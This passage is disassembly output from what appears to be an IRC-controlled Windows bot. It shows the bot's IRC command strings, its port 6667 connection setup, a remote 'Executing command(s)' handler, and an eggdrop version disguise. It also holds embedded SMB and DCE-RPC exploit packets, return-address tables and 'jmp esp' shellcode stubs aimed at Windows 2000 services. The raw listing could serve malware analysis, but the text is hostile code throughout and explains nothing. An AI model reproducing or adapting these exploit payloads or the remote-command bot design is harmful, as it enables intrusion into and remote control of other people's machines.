; DATA XREF: sub_40A9CF+1431�o
dd 2343003h, 30257830h, 2035832h, 63656420h, 3003203Ah
dd 75250234h, 2E0203h
dword_419A04 dd 1197E8h ; DATA XREF: sub_40A9CF+1400�r
align 10h
dword_419A10 dd 2AEC3778h ; DATA XREF: sub_40A9CF+1399�r
dd 2 dup(0)
dword_419A1C dd 22DB0h ; DATA XREF: sub_40A9CF+1374�r
dd 0
dword_419A24 dd 155E78h ; DATA XREF: sub_40A9CF+135F�r
align 10h
dword_419A30 dd 135A78h ; DATA XREF: sub_40A9CF+134A�r
dd 2 dup(0)
dword_419A3C dd 45444F4Dh, 732520h ; DATA XREF: sub_40A9CF+1333�o
dword_419A44 dd 121930h ; DATA XREF: sub_40A9CF+1310�r
align 10h
dword_419A50 dd 0D0EBFCFDh ; DATA XREF: sub_40A9CF+12E9�r
align 10h
aDebugModeIsS_ db 'Debug mode is %s.',0 ; DATA XREF: sub_40A9CF+129C�o
align 4
aOff db 'off',0 ; DATA XREF: sub_40A9CF:loc_40BC5B�o
aOn db 'on',0 ; DATA XREF: sub_40A9CF+1280�o
; sub_40A9CF:loc_40BC84�o
align 4
dword_419A7C dd 90F030h ; DATA XREF: sub_40A9CF+125F�r
dd 2 dup(0)
dword_419A88 dd 29FB0h ; DATA XREF: sub_40A9CF+122B�r
align 10h
dword_419A90 dd 58EE830h ; DATA XREF: sub_40A9CF+11E7�r
dd 2 dup(0)
dword_419A9C dd 25570h ; DATA XREF: sub_40A9CF+11A3�r
dd 0
dword_419AA4 dd 969E58h ; DATA XREF: sub_40A9CF+114C�r
align 10h
dword_419AB0 dd 54524150h, 732520h ; DATA XREF: sub_40A9CF+1135�o
dword_419AB8 dd 0FF778h ; DATA XREF: sub_40A9CF+1112�r
dd 2 dup(0)
dword_419AC4 dd 0FB288h ; DATA XREF: sub_40A9CF+10B0�r
align 10h
dword_419AD0 dd 4E494F4Ah, 20732520h, 7325h ; DATA XREF: sub_40A9CF+1098�o
; sub_40A9CF+10FA�o ...
dword_419ADC dd 12A488h ; DATA XREF: sub_40A9CF+102C�r
dd 2 dup(0)
aQuitSRemoved_ db 'QUIT :%s removed.',0 ; DATA XREF: sub_40A9CF+100A�o
align 4
dword_419AFC dd 55D1DB0h ; DATA XREF: sub_40A9CF+FF6�r
dd 2 dup(0)
dword_419B08 dd 85A058h ; DATA XREF: sub_40A9CF+FC1�r
dd 2 dup(0)
dword_419B14 dd 988A30h ; DATA XREF: sub_40A9CF+F80�r
align 10h
dword_419B20 dd 53005939h ; DATA XREF: sub_40A9CF+F52�r
align 10h
dword_419B30 dd 2AD87238h ; DATA XREF: sub_40A9CF+F24�r
dd 2 dup(0)
dword_419B3C dd 903F4F39h ; DATA XREF: sub_40A9CF+EFE�r
dd 3 dup(0)
dword_419B4C dd 3F53B78h ; DATA XREF: sub_40A9CF+ED0�r
dd 2 dup(0)
dword_419B58 dd 1054F8h ; DATA XREF: sub_40A9CF+EAA�r
dd 2 dup(0)
dword_419B64 dd 74736F48h, 72646441h, 3003203Ah, 73250234h, 203h
; DATA XREF: sub_40A9CF+E77�o
dword_419B78 dd 2AC15529h ; DATA XREF: sub_40A9CF+E5A�r
dd 3 dup(0)
dword_419B88 dd 65736162h, 64203436h, 646F6365h, 203A6465h, 2343003h
; DATA XREF: sub_40A9CF+E2F�o
dd 2037325h, 0
dword_419BA4 dd 90DB78h ; DATA XREF: sub_40A9CF+DC8�r
align 10h
aItTookMeUms_ db 'It took me %ums.',0 ; DATA XREF: sub_40A9CF+DA9�o
align 4
dword_419BC4 dd 65736162h, 65203436h, 646F636Eh, 203A6465h, 2343003h
; DATA XREF: sub_40A9CF+D20�o
dd 2037325h, 0
dword_419BE0 dd 27B78h ; DATA XREF: sub_40A9CF+CAF�r
align 8
dword_419BE8 dd 0F669DEC8h ; DATA XREF: sub_40A9CF+C68�r
dd 3 dup(0)
dword_419BF8 dd 51AF03CEh ; DATA XREF: sub_40A9CF+C05�r
dd 4 dup(0)
dword_419C0C dd 560C8BD9h ; DATA XREF: sub_40A9CF+BDE�r
dd 3 dup(0)
dword_419C1C dd 125EC8h ; DATA XREF: sub_40A9CF+B97�r
dd 2 dup(0)
dword_419C28 dd 23B2DEC8h ; DATA XREF: sub_40A9CF+B82�r
dd 2 dup(0)
dword_419C34 dd 3E3DEC8h ; DATA XREF: sub_40A9CF+B6D�r
align 10h
dword_419C40 dd 2AC19078h ; DATA XREF: sub_40A9CF+B3F�r
dd 2 dup(0)
dword_419C4C dd 203A5049h, 2343003h, 2037325h, 0 ; DATA XREF: sub_40A9CF+B20�o
dword_419C5C dd 3D18h ; DATA XREF: sub_40A9CF+B0C�r
dd 0
dword_419C64 dd 25CB99D8h ; DATA XREF: sub_40A9CF+AE5�r
align 10h
dword_419C70 dd 26F91BF8h ; DATA XREF: sub_40A9CF+AB4�r
dd 2 dup(0)
dword_419C7C dd 26F7D4F8h ; DATA XREF: sub_40A9CF+A83�r
dd 2 dup(0)
dword_419C88 dd 0BA3DCE82h ; DATA XREF: sub_40A9CF+A5D�r
dd 3 dup(0)
dword_419C98 dd 0BA3E0C3Ah ; DATA XREF: sub_40A9CF+A11�r
dd 3 dup(0)
dword_419CA8 dd 27740A05h ; DATA XREF: sub_40A9CF+9DC�r
dd 3 dup(0)
dword_419CB8 dd 3F2F239h ; DATA XREF: sub_40A9CF+9A1�r
dd 3 dup(0)
dword_419CC8 dd 12E5F8h ; DATA XREF: sub_40A9CF+96C�r
dd 2 dup(0)
dword_419CD4 dd 11709839h ; DATA XREF: sub_40A9CF+937�r
dd 3 dup(0)
dword_419CE4 dd 24EBDF78h ; DATA XREF: sub_40A9CF+911�r
align 10h
dword_419CF0 dd 1274D8h ; DATA XREF: sub_40A9CF+8FC�r
dd 2 dup(0)
dword_419CFC dd 119530h ; DATA XREF: sub_40A9CF+8C5�r
dd 2 dup(0)
dword_419D08 dd 5070h ; DATA XREF: sub_40A9CF+87E�r
align 10h
aThisBuildIsBro db 'This build is broken and will not function properly.',0
; DATA XREF: sub_40A9CF:loc_40B1D8�o
align 4
aThisBuildIsFul db 'This build is fully functional',0 ; DATA XREF: sub_40A9CF+7FD�o
align 4
dword_419D68 dd 2343003h, 4B4F5242h, 2034E45h, 0 ; DATA XREF: sub_40A9CF:loc_40B1AD�o
dword_419D78 dd 2333003h, 2034B4Fh, 0 ; DATA XREF: sub_40A9CF+7D2�o
dword_419D84 dd 9Ah, 0 ; DATA XREF: sub_40A9CF+79E�o
dword_419D8C dd 95EFAFB7h, 0F78CDAE8h, 0F3ABB590h, 0EACDFBD5h, 90C4C3C2h
; DATA XREF: sub_40A9CF+790�o
dd 90E0C0C0h, 0FDADB5E8h, 2 dup(0)
dword_419DB0 dd 4CFC788h ; DATA XREF: sub_40A9CF+77A�r
dd 2 dup(0)
dword_419DBC dd 225CC0D9h ; DATA XREF: sub_40A9CF+753�r
dd 3 dup(0)
dword_419DCC dd 16C4931h ; DATA XREF: sub_40A9CF+6ED�r
dd 3 dup(0)
dword_419DDC dd 0F6F3A5A0h, 0F584B2DAh, 818FC085h, 0E9A083AFh, 8484D4BBh
; DATA XREF: sub_40A9CF+534�o
dd 87F6CDABh, 2 dup(0)
dword_419DFC dd 0D9D08FA6h, 0EEA29BE9h, 0A6BAFFBAh, 0F5BEA198h, 2 dup(0)
; DATA XREF: sub_40A9CF+448�o
dword_419E14 dd 0E4F1A9B1h, 0FB9CBBCAh, 0B0B7DD94h, 0DE84BA89h, 0E7EB9284h
; DATA XREF: sub_40A9CF+437�o
dd 0D1AA94F4h, 9DFEE3BFh, 0C4B489AFh, 0DED29490h, 0CCABACE9h
dd 0BDB1F9BBh, 2 dup(0)
dword_419E48 dd 21CC8h ; DATA XREF: sub_40A9CF+410�r
align 10h
dword_419E50 dd 3F1EAF9h ; DATA XREF: sub_40A9CF+3E9�r
align 10h
dword_419E60 dd 3EDD4F9h ; DATA XREF: sub_40A9CF+3BB�r
align 10h
dword_419E70 dd 38323166h, 2B636E65h, 20626166h, 72636564h, 65747079h
; DATA XREF: sub_40A9CF+39C�o
dd 3203A64h, 25023430h, 20373h
dword_419E90 dd 242660F8h ; DATA XREF: sub_40A9CF+2C0�r
dd 2 dup(0)
dword_419E9C dd 38323166h, 2B636E65h, 20626166h, 72636E65h, 65747079h
; DATA XREF: sub_40A9CF+2A1�o
dd 3D203A64h, 2343003h, 2037325h, 0
dword_419EC0 dd 232320h ; DATA XREF: sub_40A9CF+1E3�o
dword_419EC4 dd 2B7260F8h ; DATA XREF: sub_40A9CF+18D�r
align 10h
dword_419ED0 dd 8EB758h ; DATA XREF: sub_40A9CF+158�r
dd 2 dup(0)
dword_419EDC dd 72727543h, 20746E65h, 646E6977h, 203A776Fh, 2343003h
; DATA XREF: sub_40A9CF+139�o
dd 2037325h, 0
dword_419EF8 dd 473EDB0h ; DATA XREF: sub_40A9CF+106�r
dd 2 dup(0)
dword_419F04 dd 4B43494Eh, 732520h ; DATA XREF: sub_40A9CF+CC�o
; sub_40A9CF+EF�o ...
dword_419F0C dd 1685E8h ; DATA XREF: sub_40A9CF+90�r
dd 2 dup(0)
dword_419F18 dd 3C1A6B1h ; DATA XREF: sub_40A9CF+69�r
dd 3 dup(0)
aLinkLink@linkP db 'link!link@link PRIVMSG %s :%s',0 ; DATA XREF: sub_40C93C+88�o
; sub_40D871+85F�o
align 4
asc_419F48: ; DATA XREF: sub_40C93C+30�o
; sub_40C93C+B5�o
unicode 0, <;>,0
asc_419F4C db '<=',0 ; DATA XREF: sub_40CA29:loc_40CE59�o
align 10h
asc_419F50 db '>=',0 ; DATA XREF: sub_40CA29:loc_40CE07�o
align 4
asc_419F54: ; DATA XREF: sub_40CA29:loc_40CDDB�o
dw 3Eh
unicode 0, <>,0
asc_419F58 db '!=',0 ; DATA XREF: sub_40CA29:loc_40CDAF�o
align 4
asc_419F5C db '==',0 ; DATA XREF: sub_40CA29:loc_40CD83�o
align 10h
aIpv6 db '$ipv6',0 ; DATA XREF: sub_40CA29:loc_40CC43�o
; sub_40CA29:loc_40CD58�o
align 4
aFirewall db '$firewall',0 ; DATA XREF: sub_40CA29:loc_40CC1F�o
; sub_40CA29:loc_40CD34�o
align 4
aLatency db '$latency',0 ; DATA XREF: sub_40CA29:loc_40CBFB�o
; sub_40CA29:loc_40CD10�o
align 10h
aFree db '$free',0 ; DATA XREF: sub_40CA29:loc_40CBD7�o
; sub_40CA29:loc_40CCEC�o
align 4
aVersion db '$version',0 ; DATA XREF: sub_40CA29:loc_40CBB1�o
; sub_40CA29:loc_40CCC6�o
align 4
aUptime db '$uptime',0 ; DATA XREF: sub_40CA29+158�o
; sub_40CA29+26D�o
a32s16s32s db '%32s %16s %32s',0 ; DATA XREF: sub_40CA29+EE�o
align 4
asc_419FAC db '&&',0 ; DATA XREF: sub_40CA29+9D�o
; sub_40CA29+45D�o
align 10h
asc_419FB0: ; DATA XREF: sub_40CA29+28�o
unicode 0, <)>,0
aExecutingComma db 'Executing command(s): %s',0 ; DATA XREF: sub_40CEB0+5C�o
align 10h
a6667 db '6667',0 ; DATA XREF: sub_40CF2F:loc_40CF60�o
align 4
aCSCCUCUSCCC db '%c%s%c%c%u%c%u%s%c%c%c',0 ; DATA XREF: sub_40D043+27B�o
; sub_40D871+431�o
align 10h
aG: ; DATA XREF: sub_40D043+1DC�o
; sub_40D871+392�o
unicode 0, <G>,0
aA_0: ; DATA XREF: sub_40D043+1C6�o
; sub_40D871+37C�o
unicode 0, <A>,0
aB: ; DATA XREF: sub_40D043+1B0�o
; sub_40D871+366�o
unicode 0, <B>,0
aUnk db 'UNK',0 ; DATA XREF: sub_40D043+160�o
; sub_40D871+316�o
aUserSSSS db 'USER %s %s %s :%s',0 ; DATA XREF: sub_40D043+E2�o
align 4
aPassS db 'PASS %s',0 ; DATA XREF: sub_40D043+3F�o
aNoticeS db 'NOTICE %s :',0 ; DATA XREF: sub_40D420+10�o
; sub_40D53F+37�o
aPrivmsgS db 'PRIVMSG %s :',0 ; DATA XREF: sub_40D4AB+10�o
; sub_40D53F+AF�o
align 4
dword_41A038 dd 1 ; DATA XREF: sub_40D53F:loc_40D680�o
dword_41A03C dd 7373656Dh, 20656761h, 0 ; DATA XREF: sub_40D53F:loc_40D629�o
dword_41A048 dd 49544F4Eh, 25204543h, 13A2073h, 0 ; DATA XREF: sub_40D53F+8F�o
dword_41A058 dd 56495250h, 2047534Dh, 3A207325h, 1 ; DATA XREF: sub_40D53F+63�o
aMirc db 'mIRC',0 ; DATA XREF: sub_40D734+6�o
; sub_40D74D:loc_40D76E�o
align 10h
asc_41A070: ; DATA XREF: sub_40D871+CB7�o
unicode 0, <*>,0
aNotice db 'NOTICE',0 ; DATA XREF: sub_40D871:loc_40E1C0�o
; sub_40E618+89�o
align 4
asc_41A07C db '][',0 ; DATA XREF: sub_40D871+807�o
; sub_40D871+88C�o
align 10h
a332 db '332',0 ; DATA XREF: sub_40D871:loc_40DF8E�o
aNick db 'NICK',0 ; DATA XREF: sub_40D871:loc_40DF3E�o
align 4
a@: ; DATA XREF: sub_40D871:loc_40DEBE�o
unicode 0, <@>,0
a302 db '302',0 ; DATA XREF: sub_40D871:loc_40DE96�o
; sub_40E618+33�o
a451 db '451',0 ; DATA XREF: sub_40D871:loc_40DE70�o
aUserhostS db 'USERHOST %s',0 ; DATA XREF: sub_40D871+5C4�o
; sub_40D871+5EE�o
aModeSXi db 'MODE %s +xi',0 ; DATA XREF: sub_40D871+571�o
a001 db '001',0 ; DATA XREF: sub_40D871:loc_40DD97�o
aModeSSmntu db 'MODE %s +smntu',0 ; DATA XREF: sub_40D871+515�o
align 4
aJoin db 'JOIN',0 ; DATA XREF: sub_40D871:loc_40DD25�o
align 4
aError db 'ERROR',0 ; DATA XREF: sub_40D871:loc_40DCFD�o
align 4
a433 db '433',0 ; DATA XREF: sub_40D871:loc_40DB2D�o
dword_41A0D8 dd 4950013Ah, 1474Eh ; DATA XREF: sub_40D871+290�o
dword_41A0E0 dd 4950013Ah, 474Eh ; DATA XREF: sub_40D871:loc_40DAEB�o
dword_41A0E8 dd 52455601h, 4E4F4953h, 1732520h, 0 ; DATA XREF: sub_40D871+265�o
aEggdropV1_6_16 db 'eggdrop v1.6.16',0 ; DATA XREF: sub_40D871:loc_40DAD1�o
dword_41A108 dd 52455601h, 4E4F4953h, 6E696C20h, 2576206Bh, 30252E64h
; DATA XREF: sub_40D871+24E�o
dd 73256433h, 69572820h, 2932336Eh, 1
dword_41A12C dd 4556013Ah, 4F495352h, 14Eh ; DATA XREF: sub_40D871+226�o
dword_41A138 dd 4556013Ah, 4F495352h, 4Eh ; DATA XREF: sub_40D871:loc_40DA81�o
aSend db 'SEND',0 ; DATA XREF: sub_40D871+CD�o
align 4
dword_41A14C dd 4344013Ah, 43h ; DATA XREF: sub_40D871+A6�o
aPrivmsg db 'PRIVMSG',0 ; DATA XREF: sub_40D871:loc_40D8DD�o
; sub_40D871+901�o ...
aMode db 'MODE',0 ; DATA XREF: sub_40D871:loc_40D8C2�o
align 4
aPong db 'PONG',0 ; DATA XREF: sub_40D871:loc_40D8A7�o
align 4
aPongS db 'PONG %s',0 ; DATA XREF: sub_40D871+25�o
aPing db 'PING',0 ; DATA XREF: sub_40D871+A�o
align 4
aLinkLink@link db 'link!link@link',0 ; DATA XREF: sub_40E618:loc_40E7A5�o
align 4
byte_41A18C db 41h ; DATA XREF: sub_40E979+3C�r
; sub_40EB4E+24�r ...
aBcdefghijklmno db 'BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/',0
align 10h
dword_41A1D0 dd 3430032Dh, 3732502h, 30032E02h, 73250234h, 202D0203h
; DATA XREF: sub_4129CA+5C�o
dd 202E7525h, 20776152h, 6E617274h, 72656673h, 206F7420h
dd 63207325h, 6C706D6Fh, 2E657465h, 0
dd 1130h, 0
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
db 0F5h, 28h, 5Ch
dd 400DC28Fh, 5 dup(0)
dd 1, 0
dd 77777777h, 77777776h, 77777775h, 77F326C6h, 77F29267h
dd 77777772h, 77F9D463h, 750362C3h, 75035173h, 3 dup(717564B8h)
dd 71AB7BFBh, 773AD507h, 7C941EEDh, 77DB565Ch, 77FD1F89h
dd 2 dup(77E216B8h), 1130h, 0
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
db 0F5h, 28h, 5Ch
dd 400DC28Fh, 5 dup(0)
dd 1, 0
dd 0FFCA8166h, 6A52420Fh, 2ECD5802h, 745A053Ch, 5E21B8EFh
dd 0FA8B4A9Dh, 0AFEA75AFh, 0E7FFE775h, 0
dd 2 dup(4A9D5E21h), 0
dd 77777777h, 77777776h, 77777775h, 77F326C6h, 77F29267h
dd 77777772h, 77F32836h, 750362C3h, 75035173h, 3 dup(7C2FA0F7h)
dd 2 dup(71AB7BFBh), 7C941EEDh, 77E216B8h, 77FD1F89h, 2 dup(77E216B8h)
dd 30B0005h, 10h, 48h, 7Fh, 16D016D0h, 0
dd 1, 10001h, 1A0h, 0
dd 0C0h, 46000000h, 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
aFxnbfxfxnbfxfx:
unicode 0, <FXNBFXFXNBFXFXFXFX>,0
align 4
db 0CCh
db 0E0h, 0FDh, 7Fh
db 0CCh
db 0E0h, 0FDh, 7Fh
align 8
dd 3000005h, 10h, 3E8h, 0E5h, 3D0h, 40001h, 60005h, 1
dd 0
dd 0FD582432h, 496445CCh, 0AEDD70B0h, 0D2962C74h, 0D5E60h
dd 1, 0
dd 0D5E70h, 2, 0D5E7Ch, 0
dd 10h, 0F1F19680h, 11CE4D2Ah, 20006AA6h, 0F4726EAFh, 0Ch
dd 4252414Dh, 1, 0
dd 0BAADF00Dh, 0
dd 0BF4A8h, 2 dup(360h), 574F454Dh, 4, 1A2h, 0
dd 0C0h, 46000000h, 338h, 0
dd 0C0h, 46000000h, 0
dd 330h, 328h, 0
dd 81001h, 0CCCCCCCCh, 0C8h, 574F454Dh, 328h, 0D8h, 0
dd 2, 7, 4 dup(0)
dd 0CD28C4h, 0CD2964h, 0
dd 7, 1B9h, 0
dd 0C0h, 46000000h, 1ABh, 0
dd 0C0h, 46000000h, 1A5h, 0
dd 0C0h, 46000000h, 1A6h, 0
dd 0C0h, 46000000h, 1A4h, 0
dd 0C0h, 46000000h, 1ADh, 0
dd 0C0h, 46000000h, 1AAh, 0
dd 0C0h, 46000000h, 7, 60h, 58h, 90h, 40h, 20h, 78h, 30h
dd 1, 81001h, 0CCCCCCCCh, 50h, 2088B64Fh, 0FFFFFFFFh, 13h dup(0)
dd 81001h, 0CCCCCCCCh, 48h, 660007h, 20906h, 0
dd 0C0h, 46000000h, 10h, 2 dup(0)
dd 1, 0
dd 0C1978h, 58h, 60005h, 1, 9398D870h, 11D24F98h, 57BE3DA9h
dd 0B2h, 310032h, 81001h, 0CCCCCCCCh, 80h, 0BAADF00Dh
dd 4 dup(0)
dd 144318h, 0
dd 2 dup(60h), 574F454Dh, 4, 1C0h, 0
dd 0C0h, 46000000h, 33Bh, 0
dd 0C0h, 46000000h, 0
dd 30h, 10001h, 317C581h, 4AE90E80h, 8AF19999h, 857A6F50h
dd 2, 5 dup(0)
dd 1, 81001h, 0CCCCCCCCh, 30h, 6E0078h, 0
dd 0DDAD8h, 2 dup(0)
dd 0C2F20h, 2 dup(0)
dd 3, 0
dd 3, 580046h, 0
dd 81001h, 0CCCCCCCCh, 10h, 2E0030h, 4 dup(0)
dd 81001h, 0CCCCCCCCh, 68h, 0FFFF000Eh, 0B8B68h, 2, 3 dup(0)
dd 20h, 0
dd 20h, 5C005Ch, 0
aC1234561111111:
unicode 0, <\C$\123456111111111111111.doc>,0
align 10h
dd 81001h, 0CCCCCCCCh, 20h, 2D0030h, 0
dd 0C2A88h, 2, 1, 0C8C28h, 1, 7, 2 dup(0)
dd 2180310h, 10016C6h, 100139Dh, 1001C55h, 1001C98h
dword_41A7A8 dd 5F5C0A0Dh, 2E2Fh ; DATA XREF: sub_410649+59�o
; .text:00410B61�o
dword_41A7B0 dd 30B0005h, 10h, 48h, 0 ; DATA XREF: sub_410649+F�o
dd 16D016D0h, 0
dd 1, 10000h, 4D9F4AB8h, 11CF7D1Ch, 20001E86h, 577C6EAFh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_41A7FC dd 3000005h, 10h, 5 dup(0) ; DATA XREF: sub_410649+181�o
dword_41A818 dd 10005h, 2 dup(0) ; DATA XREF: sub_410649+1AD�o
dd 75757D58h, 47C6EB40h, 0A74E71BCh, 97B5D01Ch, 5 dup(0)
dd 90000h, 300h, 0
dd 300h, 5C005Ch, 0
dword_41A860 dd 0 ; DATA XREF: sub_410649+475�o
dd 2, 0
dd 1, 91C68h, 1, 2 dup(0)
dd 0C0h, 46000000h, 2 dup(1), 7
; ---------------------------------------------------------------------------
loc_41A894: ; DATA XREF: sub_410649+153�o
mov eax, [esp-4]
add eax, 0FFFFFAE0h
jmp eax
; ---------------------------------------------------------------------------
align 10h
loc_41A8A0: ; DATA XREF: sub_410649+E5�o
mov eax, [ebp+30h]
add eax, 0FFFFFB24h
jmp eax
; ---------------------------------------------------------------------------
align 4
loc_41A8AC: ; DATA XREF: sub_410649+202�o
jmp short loc_41A8BE
; ---------------------------------------------------------------------------
jmp short loc_41A8C9
; ---------------------------------------------------------------------------
dd 0
; ---------------------------------------------------------------------------
loc_41A8B4: ; DATA XREF: sub_410649+2DB�o
jmp short near ptr word_41A8BA
; ---------------------------------------------------------------------------
dw 0FFFFh
db 2 dup(0FFh)
word_41A8BA dw 0 ; CODE XREF: .data:loc_41A8B4�j
; ---------------------------------------------------------------------------
loc_41A8BC: ; DATA XREF: sub_410649+330�o
jmp short near ptr word_41A8C2
; ---------------------------------------------------------------------------
loc_41A8BE: ; CODE XREF: .data:loc_41A8AC�j
; .data:loc_41A8DC�j
jmp short loc_41A8C4
; ---------------------------------------------------------------------------
db 2 dup(0)
word_41A8C2 dw 0 ; CODE XREF: .data:loc_41A8BC�j
; ---------------------------------------------------------------------------
loc_41A8C4: ; CODE XREF: .data:loc_41A8BE�j
; DATA XREF: sub_410649+385�o
jmp short near ptr loc_41A8C9+1
; ---------------------------------------------------------------------------
dw 0FFFFh
db 0FFh
; ---------------------------------------------------------------------------
loc_41A8C9: ; CODE XREF: .data:0041A8AE�j
; .data:loc_41A8C4�j
inc dword ptr [eax]
; ---------------------------------------------------------------------------
db 0
aA: ; DATA XREF: sub_410649+449�o
unicode 0, <\A>,0
align 8
dword_41A8D8 dd 77F33723h ; DATA XREF: sub_410649+25A�o
; ---------------------------------------------------------------------------
loc_41A8DC: ; DATA XREF: sub_410649+286�o
jmp short loc_41A8BE
; ---------------------------------------------------------------------------
dw 7FFDh
; ---------------------------------------------------------------------------
loc_41A8E0: ; DATA XREF: sub_410649+22E�o
lahf
jnz short loc_41A8FB
loc_41A8E3: ; DATA XREF: sub_410649+13D�o
add [ecx+1Ch], bl
loc_41A8E6: ; CODE XREF: .data:loc_41A8F0�j
add [ecx], al
loc_41A8E8: ; DATA XREF: sub_410649+111�o
or ecx, [ebx]
sbb eax, [eax]
loc_41A8EC: ; DATA XREF: sub_410649+127�o
jmp short near ptr dword_41A8F4
; ---------------------------------------------------------------------------
align 10h
loc_41A8F0: ; DATA XREF: sub_410649+FB�o
jmp short loc_41A8E6
; ---------------------------------------------------------------------------
align 4
dword_41A8F4 dd 85000000h ; CODE XREF: .data:loc_41A8EC�j
; ---------------------------------------------------------------------------
call dword ptr [ebx+4Dh]
loc_41A8FB: ; CODE XREF: .data:0041A8E1�j
inc edx
jb short $+2
; ---------------------------------------------------------------------------
dw 0
dd 0C8531800h, 3 dup(0)
dd 0FEFF0000h, 0
dd 2006200h, 4E204350h, 4F575445h, 50204B52h, 52474F52h
dd 31204D41h, 200302Eh, 4D4E414Ch, 2E314E41h, 57020030h
dd 6F646E69h, 66207377h, 5720726Fh, 676B726Fh, 70756F72h
dd 2E332073h, 2006131h, 2E314D4Ch, 30305832h, 4C020032h
dd 414D4E41h, 312E324Eh, 544E0200h, 204D4C20h, 32312E30h
dd 0
dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 4
dd 0
dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h, 240043h, 3F3F0000h, 3F3F3Fh, 0
dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
dd 401495h, 3, 40707Ch, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 2 dup(0)
dd 40A89Ah, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 2 dup(0)
; ---------------------------------------------------------------------------
sub sp, 71Ch
jmp esp
; ---------------------------------------------------------------------------
align 4
dd 1004600h, 7515123Ch, 751C123Ch, 42B68ABAh, 42D01E50h
dd 34000112h, 0
dd 150000h, 1B000106h, 20100h, 30C001Ch, 4002800h, 20008FFh
dd 10h, 0
dd 34EEA51Bh, 0
dd 12400h, 0
dword_41AF50 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: .text:00410BB4�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_41AFDC dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:00410BF4�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows20002_0:
unicode 0, <Windows 2000 2195>,0
aWindows20005_1:
unicode 0, <Windows 2000 5.0>,0
align 8
dword_41B088 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:00410C34�o
